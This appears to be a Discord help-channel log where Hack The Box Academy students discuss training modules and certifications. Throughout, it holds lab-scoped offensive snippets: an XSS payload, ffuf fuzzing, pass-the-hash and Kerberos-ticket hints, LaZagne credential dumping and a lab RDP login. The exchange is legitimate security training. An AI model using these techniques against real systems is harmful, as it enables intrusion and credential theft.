sly arrow
#

even the cheapest lap top will do

neon furnace
#

well, then you're out of luck probably, although I think it should be possible, it requires lot of effort, and you'd spend most of your time trying to get your tooling to work. You def need a remote workstation to connect to, that's the only way I could see this happening

final shale
#

I just hate vi so much. You guys should do like a Tier 0 module for vi 😛

visual umbra
#

some one can help me with Web Fyzzing. Im in the qusestion: One of the pages you will identify should say 'You don't have access!'. What is the full page URL?

I get the answeares for the 2 questions before: i do fuzz in every subdomain and get one .php page with the command ffuf -w /directory-list-lowercase-2.3-small.txt:FUZZ -u http://****.academy.htb:56223/FUZZ -recursion -recursion-depth 1 -e .html,.php,.phps,.php7 -v -fs 287 and one directory but dont get the page saying "You dont Have Access" when visit the sites its just a ampty page, was try with curl 2 but nothing. When i fuzz the direcories it is showing 0.. Can some one help me out?

visual umbra
sly arrow
#

has anyone1 done the xss module? im kinda stuck on the beginning of xss discovery part where it asks you to test the payload <HtMl%09onPoIntERENTER+=+confirm()> from a scanner to the previous exercices. am i meant to get it working or is it meant to demonstrate that the scanner payloads dont always work?

midnight galleon
visual umbra
midnight galleon
#

for real world targets you can find a 5$/month vps and use it as an attack host

visual umbra
midnight galleon
#

but yeah just get an old rack bro and slap an ubuntu or something on it

visual umbra
sly pumice
midnight galleon
midnight galleon
sly pumice
#

Oh ok

pulsar oak
#

Hello everyone, I started going through modules on web attacks on HTB, but I don't think I understand the very essence of what I'm doing, where can I get a deeper the basics on web attacks?

opal nexus
neon furnace
#

Not sure which channel to ask this in, but are there any forbidden tools on exams? Like CWEE, it has no rules on the page for prohibited tools, and I guess there's no proctoring either as with Offsec, but Burp Pro for example could give you an advantage

visual umbra
#

Going crazy.. Im in last qusetion in Skill Assesment Wbb Fuzzing; get thix: <div class='center'><p>This method is no longer used.</p></div> What other metod i going to use? im doung this: curl -X POST http://faculty.academy.htb:56223/*/*.* -d "=" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0" -H

neon furnace
#

Also an extra question, if I purchase a voucher, can I access the exam right away, or you need to schedule the exam for a pre-determined time?

visual umbra
#

or POST

dapper moth
neon furnace
storm elk
#

its not proctored, and no forbidden tools

#

just don't ask anyone for help

neon furnace
#

nice

urban elk
midnight galleon
#

the AD sets in the Active Directory Enumeration & Attacks module, An ACE in the Hole/Stacking The Deck subsections (these who have dual IP setup) seems to take 30min+ to fully load

celest sigil
visual umbra
opal nexus
shut vapor
#

I'm on Attacking Web Applications with Ffuf > Skills Assessment - Web Fuzzing: "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?"

I have the answer, but it's not submitting and jiggling the answer hasn't helped. E.g. I've tried:

  • Literally the full url: [http]://xxxx.yyyy.zzz:pppp/dddd/page.ext
  • Without the http://: xxxx.yyyy.zzz:pppp/dddd/page.ext
  • Without the port
  • As an IP address even though a vhost is at play

Anyone willing to DM me to check my answer is right and give me a clue what this thing wants?

quiet trout
ivory cloud
#

Hi everyone, this is maybe not the right place but I'm unable to post in General.

Has anyone taken the CREST CRT preparation course and passed the exam or was additional training required. I'm interested in hearing your journey if you've taken the CRT, what worked well and what didn't.

TIA

calm abyss
pseudo kiln
#

shoot

calm abyss
# pseudo kiln shoot

using crackmapexec LDAP and RDP Enumeration module i managed to get the hash from svc_gmsa$, but i tryed allmost everything to get the flag.

I am stuck with a hash

#

Use the service account you found to access the shared folder serviceaccount and read the flag.

pseudo kiln
#

well, have you tried to authenticate with the hash ?

calm abyss
#

--local-auth

#

STATUS_LOGON_FAILURE

#

i can list the shares but everything else seems to be wrong

#

i tryed cracking the hash with hashcat but no luck, so i can use smbclient

dapper moth
#

If you can authenticate with the hash, you can read a file

quiet trout
#

have you tried passing the hash like been suggested?

pseudo kiln
#

you tried this, correct -H <NT HASH> ?

calm abyss
#

yes

dapper moth
#

—get-file

#

—spider

pseudo kiln
#

ok, in that case, consider what other protocols can be used to execute commands if you only tried it with smb

#

hint: nxc <protocol>

calm abyss
#

nxc: error: unrecognized arguments: -H HASH

terse tapir
#

hey guys, I was able to solve the Firewall and IDS/IPS Evasion - Hard Lab

#

can someone enlight me?

fathom pendant
#

Just do the scan without specifying the port, there you go

#

Do -p- instead

terse tapir
#

I did, it takes ages

#

I will try again

fathom pendant
#

-sT -T4 tends to speed it up

terse tapir
#

mh...thanks guys, I will try again

fathom pendant
#

Look into nmap documentation if you're unsure what a command flag does

pseudo kiln
fathom pendant
#

Dude. Stop saying the port lol

cloud urchin
#

netexec was preinstalled on my kali

fathom pendant
#

The point is it could have been any port

#

Coincidences happen

pseudo kiln
calm abyss
terse tapir
fathom pendant
terse tapir
#

i MUST understand, that's the point pof real learning. thanks! 🙂

fathom pendant
#

RTFM is a mantra; read the fucking manual

#

If the manual doesn't provide answers then question away

terse tapir
fathom pendant
terse tapir
#

I will check immediatlely. I am a senior manager. I want to get CISSP but before that i want to really understand things and get CPTS and OSCP at least. I think CPTS will outclass OSCP soon as industry standard!

fathom pendant
#

Especially since OSCP basically shot themselves in the foot (short term) with OSCP+

#

Well offsec*

terse tapir
#

yep! plus i love to program and hack things. I will get the bug bounty cert too. I did QA for ages and I was very good in finding bugs. Plus I studied front end and back end development already.

obsidian bronze
#

does anyone know how to get the fedora34 iso?

fathom pendant
terse tapir
fathom pendant
terse tapir
#

third result...damn.

fathom pendant
terse tapir
#

almost 😄

terse tapir
#

for the love of god I will take them all lol

fathom pendant
#

The only reason I suggest CWEE is because that sounds more up your alley than cbbh, and cbbh is honestly the weakest cert

terse tapir
#

I agree with you

#

basically I do not need it, I will bug hunt already after ctps and cwee

#

the mindset is kicking-in more and more and that is the most important thing

obsidian bronze
calm abyss
fathom pendant
fathom pendant
#

And should be taken up with RH/fedora support not randoms on an infosec discord

obsidian bronze
terse tapir
fathom pendant
#

I'm not a mod

calm abyss
terse tapir
#

ops

obsidian bronze
terse tapir
#

I mean fix the OS

fathom pendant
#

Then re-download and reflash the usb you're using

terse tapir
fathom pendant
#

Or use a new usb entirely

calm abyss
#

even pwn box started to throw errors

obsidian bronze
fathom pendant
#

Either way; the conversation around installing fed isn't for this channel

#

#1024429874246590575 is a gamble but you can ask there and provide more details and maybe screenshots

obsidian bronze
#

👍

terse tapir
#

I have a barebone fedora machine

#

if you want dm me and tell me the problem

obsidian bronze
opal nexus
silver patio
#

-Pn?

somber fiber
silver patio
somber fiber
#

Cause its treating all the hosts as online

#

which module you are working on

celest sigil
fathom pendant
somber fiber
#

is your vpn connected

fathom pendant
#

This channel is for academy modules, not starting point machines

somber fiber
#

jump in vc

#

what ports have you found?

silver patio
fathom pendant
somber fiber
finite abyss
calm abyss
flint tinsel
#

I need help with: Getting Started | Public Exploits |
"Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file"

||Using the IP and Port number and going to that address, I see what type of exploit it wants me to use, I set up the exploit and use it, but when I get the backup file, it doesn't contain any information regarding a flag or information that I can use. The file I get is /etc/passwd which is default, but when poking around and trying to run a dir scan with gobuster, I don't find any other domains that I can pull from. If I try a different path, it doesn't return anything. I have also tried accessing the /simple-backup directory, but that just shows as empty. Ive tried uploading a web shell and get close, but it fails after not receiving a 200 OK||

Idk I feel like I am way overthinking this

fathom pendant
#

You're definitely overthinking

#

Look at the payload you're using and what can be changed, no uploads needed

rustic sage
#

I'm in the medium footprinting lab under pentest path. I found sa and alex creds but I can't login the sql. Also while looking on the HTB community webpage I saw a screen of someone else doing the same nmap scan and they have different ports open, like I don't have ssh imaps and pop3

#

I also tried the udp scan but it times out

fathom pendant
rustic sage
fathom pendant
#

Also consider reused passwords

rustic sage
#

Alex and sa, i tried both of them

fathom pendant
#

Then running the db

fair mural
#

Having the same issue. Did you ever figure out a fix?

fathom pendant
#

That's why it can't find the file

#

You need to specify the filepath

#

Your dir command even tells you it's in C:\

flint tinsel
flint tinsel
# fathom pendant Bingo

Im going to drive into a median with my seatbelts unbluckled, I tried I swear everything but that alr thank you godsent

flint tinsel
#

ofc, if I paid for it, Im gonna use it

lofty whale
#

Doing the easy lab and have already gotten the files and changed the permissions on them but when I try and upload it tells me overwrite permission denied. Any help

#

In footprinting that is

#

Do I rm the files that are there or am I missing something

errant onyx
#

hi, i am having problems with one of the exercises. I am supposed to setup a localhost for my xxe.dtd file. The server is not accessible from outside addresses. Can anyone push me in the right direction in solving this issue please? probably some kind of firewall/security for my own protection? I'm running my own Kali Linux in VirtualBox. Thank you in advance!

bright nova
#

Hi guys, not sure if here is the right place to ask, but do you know if the balance I get from a gift card can be used towards buying a yearly academy subscription ?

cloud urchin
errant onyx
#

ah yes, i was using the wrong IP, thanks!

neon furnace
#

Blind SQL Injection module, it says on the 3rd section "Note: You can start the VM found in the question at the end of the next section for the module's practice web apps.", but there's no web app to start. I can only start the MSSQL database on all the pages. Can someone enlighten me on where the web apps can be spawned?

urban elk
rich wraith
#

I don't understand this, it says they are the same but according to wikipedia they are different but similar

#

Monitor mode is only for WNICs and promiscuous is for both wired and wireless interfaces right?

dusk crater
#

hi guys, still on password crackin module, in the password reuse/pasword default section. I m using the default sheet credential and i get this error
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[ERROR] invalid line in colon file (-C), missing colon in line: MySQL,admin@example.com,admin

#

someone can explain me?

rustic sage
#

Guys if I'm doing udp scan and the box responds to me from nmap -sU scan but doesn't respond with snmpwalk or braa what does it mean

dapper moth
#

Anyone who finished Advanced Deserialization for a few pointers on the XML Section?
I think I'm messing just the last part

quasi wave
#

I'm doing the password attacks section on credential hunting on windows and the issue is there's no .exe file version of lazagne

#

but the section requires an .exe file for lazagne

#

but in the lazagne github there is no such file only .py file

#

what should I do?

#

I tried looking up how to compile python to exe but I need a compliler for that and the windows host that this section uses has no access to the internet

#

and I can't find the .exe file anywhere in the LaZagne github that I cloned onto the Parrot attack box

analog dock
#

Well ask him first but usually he doesn’t mind

#

He finished the path

wanton ore
#

Hi guys, I'm in the AD Enum and Attack module currently.
I'm trying to run bloodhound-python on the domain controller while proxing using sshuttle also tried proxychains, but I keep getting an error about DNS timeout (increasing the timeout wont solve it). I can run bloodhound-python if I ssh to the attack box.
Is there a way I can solve this?

dapper moth
ocean night
#

@chilly geode not the place. Move on

quasi wave
#

hi is anyone able to help me with the module?

fathom pendant
quasi wave
#

the thing is even if I get an exe version I still can't copy exe files over to the windows box

#

I use cat but that doesn't let me copy entire file and

#

if I use text editor it won't let me view data

fathom pendant
#

Plenty of ways to transfer files

quasi wave
fathom pendant
#

xfreerdp has the /drive: option

quasi wave
#

ok

fathom pendant
#

You can use http.server and download the file

quasi wave
#

ok

fathom pendant
#

You can open an smb share...

#

So on and so forth

#

Many ways to crack an egg

quasi wave
#

ok

#

like this?

└──╼ [★]$ xfreerdp /v:10.129.17.140 /u:Bob /p:HTB_@cademy_stdnt! /drive:/home/Desktop/LaZagne
#

what am I doing wrong there

#

got it working with smb

#

or not smb but /drive option

fathom pendant
quasi wave
#

We’ll see how well it works after I get everything copied over

sonic plume
#

could I dm someone for a little nudge for Attacking Common Services - Hard skill assessment. (last question)

analog dock
#

At least in my experience

dapper moth
analog dock
#

Especially vautia knows how to make our life difficult with his sa’s

quasi wave
#

its saying the version of lazagne is incompatible with 64 bit windows but I downloaded 64 bit version

cloud urchin
#

what link did you use to download? protip: it's a good idea to copy the tools from the various modules over to your box to use later.

quasi wave
#

github

cloud urchin
#

well that's why, github isn't a valid link 😛

quasi wave
#

I downloaded onto attack box then copied into windows box

#

but I downloaded the file I didn't use a link to github itself to run it

#

so I'm unsure what your saying

cloud urchin
#

i'm saying throwing 'github' into your browser isn't going to navigate you to a link, it's going to perform a search for 'github'. what is the actual real full link you used to download it?

quasi wave
#
git clone https://github.com/AlessandroZ/LaZagne.git```
#

that was to get it to attack box

#

then used /drive parameter in xfreerdp to copy it over

cloud urchin
#

if you cloned the github you'll need to compile it, easier just to download the release

quasi wave
#

ok I am having some trouble finding the actual release. I googled it and the github was the result I got

#

wait found it

#

will try downloading now

cloud urchin
quasi wave
#

ok

analog dock
#

And it ended up being a matter of encoding or removing a linebreak

#

Since then I hate web even more, but I just want to finish my oswe

quasi wave
#

I found one password but lazagne is only open to view results for a split second

#

how do I store results longer?

#

I got the answer to one question

safe star
#

Did you open through cmd?

tender nimbus
#

Hey guys im stuck on something in the skill assement for pivoting and tunneling

cloud urchin
tender nimbus
#

i have a lsass.dmp that i need to transfer to my attack host and im stuck like nothing is working i just tried an http server on the machine and tried to take the file like this but its says it cant connect to remote server also ftp serve, smb etc

cloud urchin
quasi wave
#

now gonna take break then work on fourth question

#

I think I figured out what I was asking

tender nimbus
# cloud urchin have you done the file transfer module?

just in the begining i did it from my attack host but then i remember that i havent acces to the172.16 network so i transfered mimikatz to the first pivot host i had connection with but idk why i cant transfer from pivot to target

cloud urchin
# tender nimbus

i'd probably just setup chisel on the pivot and rdp into the machine that's on the internal vlan and transfer via rdp personally

dapper moth
analog dock
#

I prefer ad by miles

modern sparrow
#

hey there i m new here and needed help with this question >>>>>>What does the acronym Linux PAM stand for?<<<<<<<<<<<<< PLEASE HELP IV TRIED EVERYTHING I CAN THINK OF.... AND IT STILL SAYS WRONG ANSWER.

storm elk
modern sparrow
#

WELL ITS THE QUESTIN ON THE "VPS HARDING" SECTION.

fathom pendant
normal sand
#

Just wanted to check something: If I dump password hashes for local users on a system, it's possible for those password hashes to work on other systems in the environment as well, right?

fathom pendant
#

It depends

normal sand
fathom pendant
#

If it's like a default password, maybe

#

Often you'll have luck with, for instance, admin reuse

#

But yeah it'd have to be the same password to be usable. As that's what the hash is based off of

normal sand
#

Gotcha, thanks for the clarification!

fathom pendant
#

And the other machine on the network would have to have some sec settings to also allow it

fathom pendant
#

Yes

#

Ntlm should be deprecated and not allowed/used, however it's just not configured

fathom pendant
#

Meaning the rc4/ntlm algorithm that allows for PTH is literally used bc of misconfiguration/laziness

#

I believe the cpts ad module explains it a bit more

normal sand
#

I'd forgotten about it, I'm sure it's somewhere in my notes though. Gotta go back and look for it in the module.

normal sand
red shuttle
urban elk
karmic dirge
#

Where in this chat do I post if there is a typo in one of the academy courses. Specifically Intro to Whitebox Pentesting
Code Review - Authentication. The validateEmail snippet says SIP instead of SNIP

storm elk
karmic dirge
#

Thank you

obsidian scroll
#

Where can i chat if I am seeking help regarding a task in the footprinting module of the pentester path ?

obsidian scroll
#

M on the IMAP module in Pentester path trying to enumerate this server using imap
Used openssl, curl and whatnot
I used the default robin:robin credentials.
Now I am connecting to imap server and getting the cert issuer email ID as cto.dev@dev.inlanefreight.htb And that should be the admin email ID right ?? But the answer is wrong so I am clueless as to what is the correct answer.

Also for the next question which is finding the flag, I have connected to IMAP and am using IMAP commands to navigate to the flag, but I seem to be super confused about how to access the message.

I don't want the answers to them but I hate being stuck and clueless about stuff that should supposedly be simple 🙂
ANyways here is an SS for context :

#

I guess i cannot paste an SS here

stark lark
#

What am I doing wrong? Should be quite simple..

viscid crescent
#

Hi, do you recommend to use Windows as OS while doing windows binary attack modules?

fiery berry
viscid crescent
modern sparrow
#

CAN SOMEONEPLEASE HELP ME WITH THIS QUESTION!!!

storm elk
storm elk
#

@modern sparrow please, post without caps. No need for them.

#

Also, google it, I just tried it and I got the answer in 5 sec

faint geode
#

Dude stop with the caps...

modern sparrow
#

dude calm down its not that big of a deal..

storm elk
#

And the answer is correct. Make sure that the capitalisation of your words are correct and there are no spaces in front or at the back

urban elk
#

I'm sure it's been considered before, what's the staff's stance on trimming whitespace in the answer boxes ? Would cut down on support burden in a non-negligible way it seems

storm elk
#

But I agree 🙂

urban elk
#

sure, I'll leave a note 🙂 I thought it must have come up before

midnight galleon
midnight galleon
urban elk
#

how so ?

dapper moth
dapper moth
unique ether
#

can anybody help with password attacks page pth linux Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio. I have imported the ccache file klist says julio but when i run the smb command it gives me this error ```
smbclient //dc01/julio -k -c 'get julio.txt' -no-pass
gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/dc01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER fix this

eager ledge
midnight galleon
#

and url encoding

eager ledge
#

tried that. I could not get absolute path to work. I used relative path to execute dir command on the Administrator's Desktop

fiery berry
# stark lark

That's an example. It doesn't mean you have that header in the response (which is your case), and you should be using -i with grep to ignore case distinctions. Another useful flag to add is -s to curl to don't show progress meter or error messages.

midnight galleon
eager ledge
autumn pilot
#

There is a way you can use an automated approach

#

granting you with a reverse shell

median gale
#

How do Tier 4 modules differ from the tier 3 ones?

copper pendant
#

Good day. Im an absolute beginner on the HTB currently enrolled in the CDSA path. Trying to complete my first exercise in the "Introduction To The Elastic Stack
" section of the "Security Monitoring & SIEM Fundamentals " module. I am supposed to use Kibana to execute some queries but I haven't the first idea where to find it. Have searched "Kibana", "Elastic*" to no avail

eager ledge
midnight galleon
pseudo kiln
tribal plinth
astral ravine
#

I need some guides to solve network enumeration with nmap hard lab. I finsihed easy & medium lab. I need hints to complete that module. I'm available in DM. you can guide me to the answer there

median gale
dapper mountain
dapper moth
tribal plinth
tribal plinth
midnight galleon
#

i was wondering what happened to the people who got the powerview when it was a T4 module

visual umbra
#

Hello. Im in Module Cracking pswd with HashCat. The qusetion is: Identify the following hash: $S$D34783772bRXEx1aCsvY.bqgaaSu75XmVlKrW9Du8IQlvxHlmzLc i get the hash type with hashid '$S$D34783772bRXEx1aCsvY.bqgaaSu75XmVlKrW9Du8IQlvxHlmzLc' and get a answer in this format: * > v.x iv been trying all kinde off formats when i put in the asnweare but it says "Wrong" all the time, the hashtype is correct i know it, but what im doing wrong?

midnight galleon
#

Active Directory PowerView was a T4 module and it got lowered to T3 when the AD path was introduced
So people who got it when it was a T4 module got it at double the current price

midnight galleon
visual umbra
#

the problem is probely how to type the asnwere iv been trynig difrent typeing with upper and lowers etc and space or no space and , or no , etc

#

soloved it. it was like i say, the format off the answare

daring charm
#

Hello everyone. I am new here. I'm requesting for your help. There's a question on HTB Academy under "Information Gathering - Web Edition: Subdomain Bruteforcing" that has been bugging me for days and I love help on solving it.

visual umbra
#

it was a space before > and the answare dit not accept it with space, so a deletade the space and now it is ok..

tribal plinth
waxen mountain
#

Hello

daring charm
eager ledge
daring charm
# midnight galleon what is troubling you

I have been running dnsenum, ffuf and gobuster on the site (inlanefreight.com. Provided on the question) but I keep getting similar subdomain results. Let me share the output.
www.inlanefreight.com. 131 IN A 134.209.24.248
ns1.inlanefreight.com. 122 IN A 178.128.39.165
ns2.inlanefreight.com. 137 IN A 206.189.119.186
ns3.inlanefreight.com. 300 IN A 134.209.24.248
support.inlanefreight.com. 300 IN A 134.209.24.248
my.inlanefreight.com. 300 IN A 134.209.24.248
customer.inlanefreight.com. 300 IN A 134.209.24.248

daring charm
waxen mountain
#

Hello guys, who is a hacker and can help me out?

analog dock
#

Immediate friend request

#

Oh dear

#

And dm

waxen mountain
#

🙃

midnight galleon
acoustic sparrow
daring charm
compact apex
#

Anyone else having connectivity issue with RDP on Active Directory Enumeration & Attacks ?

#

I am just having blackscreen when I attempt to log in

compact apex
quiet trout
gray yacht
# obsidian scroll M on the IMAP module in Pentester path trying to enumerate this server using ima...

This IMAP 101 post is the third of our how-to tutorials designed to help you interact with open, text-based protocols in the email industry. What is IMAP?

An overview of the main IMAP commands that a client can send under RFC 3501 (and others). What the command does. Plus small example snippets.

midnight galleon
empty trout
#

recently internet archive got hacked and the adversary stole user data . there is section on wayback machines in information gathering web edition to find the total number of hacking labs on htb at 2018 8 aug but i dont see any archive on that date

#

i am asuming other data like snapshots of websites are also affected in this attack

compact apex
midnight galleon
haughty atlas
#

hello everyone, I just joined and am working on my first module but i am have and issue, can some one help me?

#

i'm working on the introduction to windows section, talking about remote access

haughty atlas
#

so i believe i followed the instruction but it is though this error at me, saying that WARING Certificate name mismatch on the parrot Terminal

compact apex
#

Do you have your VPN connected ?

compact apex
haughty atlas
#

uuuuu.. i am VERY new to this

#

well it is teaching me about Connecting to a windows Target

empty trout
#

is it talking about vpn

compact apex
#

ok and you doing it from what ? your own machine or from the virtual machine provided at the end of the section (Parrot OS)?

haughty atlas
#

i am using the one provided in the section

compact apex
haughty atlas
#

Bash i belive

compact apex
#

yes but what command do you enter in your terminal

haughty atlas
#

xfreerdp /v:10.129.60.49 /u:htb-student /p:Academy_WinFun!

compact apex
#

try

xfreerdp /v:10.129.60.49 /u:htb-student /p:'Academy_WinFun!'
haughty atlas
#

ooo so it did the same thing, but i just read the "Do you trust the above cert Y/N answered Y and it opened!

compact apex
#

yes you have to type Y or yes

haughty atlas
#

a lot to learn.. haha thank you

empty trout
compact apex
empty trout
winter schooner
fathom pendant
topaz ginkgo
#

Attacking GraphQL mini-module
Skills Assessment

I don't know what else to try, I only see some keys that are useless, there is no relevant field to mutate, nor have I found a SQL injection.

Any hint?

empty trout
fathom pendant
#

Someone else told you what htb's old tld was

winter schooner
#

Can anyone give me hint on password attacks module, attacking services brute forcing rdp. I tried crackmapexec and hydra, and for hydra it says all accounts are inactive and for crackmapexec i cant find a valid combination. Im using the wordlists provided in resources.

grizzled marsh
#

Hello guys! Who has already completed the Wi-Fi pentesting module ?

grizzled marsh
#

Have you ?

dapper moth
#

Yes

fathom pendant
dapper moth
#

Just ask away

fathom pendant
#

Just get to the point lol

grizzled marsh
#

Can I dm you ?

dapper moth
#

It’s easier if you ask here cause other users might have the same question

#

Easier for people to find the info they need after

grizzled marsh
#

I'm having issue regarding the skills assessment questions!

#

I don't know why the access point isn't completing the handshake with the station. As you know I need it to be able to crack the password.

grizzled marsh
ruby lynx
#

im not allowed to send messages in general

fathom pendant
haughty atlas
#

hello, i have having an issue submitting a answer i "think" right, the question is Which Windows NT version is installed on the workstation? (i.e. Windows X - case sensitive) My answer : Windows 10.0.19041 but it says its wrong?

fathom pendant
#

Too many numbers

#

Think simple

haughty atlas
#

....

#

i just got it

tranquil garnet
#

Hey Guys I cannot get the krbtgt hash in Documention and Report lab.
[3:09 PM]
After achieving Domain Admin, submit the NTLM hash of the KRBTGT account.

midnight galleon
tranquil garnet
gritty arch
#

Hello everyone! I struggle in the skill assesment of the pivoting and port forwarding module. When I do my sock proxy and then proxychains nmap to the IP that I've found (with of course -Pn and -sT options), I cannot see any port that is up nor the view shown previously in the module (where is all the "time out" or "ok" when it hits a port). I've checked and it's the right IP address found with the ping sweep

#

does anyone has a clue why?

dapper moth
#

You can connect to it via GUI once you perform the necessary technique

winter schooner
midnight galleon
winter schooner
#

it doesnt work for me

quiet trout
#

so its prob a wordlist issue

#

(perhaps), and im not even sure about this specific module, but i do recall specifically people struggling with the bruteforcing modules and that coming up (search channel if inclined)

quiet trout
#

this has caused people grief in the past, not sudo'ing the cmd

grizzled marsh
#

I can see that there is an association between a station and the access point but there no eopol handshake captured in the traffic

dapper moth
gritty arch
gritty arch
#

I'll try to reset the target and pwnbox

grizzled marsh
winter schooner
dapper moth
gritty arch
#

That works now! Thank you exciton!

wild sage
#

Does anyone know the updated command for sqlplus? I'm on Footprinting Oracle TNS and I got odat to run, but when trying to use the sqlplus tool, it comes back as command not found? I am using the HTB Pwnbox

gray yacht
wild sage
obsidian scroll
rugged turtle
#

Hi guys, im having trouble in the AD Enumeration & Attacks chapter. in the chapter about Privileged Accesses the exercise spawns two machines, the target and the attack machine. Is it normal that I cannot ssh to the attack machine with the given credentials ?

midnight galleon
#

in the setup scenario

rugged turtle
#

you mean at the beginning of the module?

midnight galleon
#

did you read this section?

#

Privileged Accesses

rugged turtle
#

my god, I must've tried all the possible combinations except this one lol

#

that's because I was issuing the ssh from the foothold with the internal IP

#

I must say this format as is is slightly confusing

midnight galleon
rugged turtle
#

however, thanks a lot for the quick help 🙂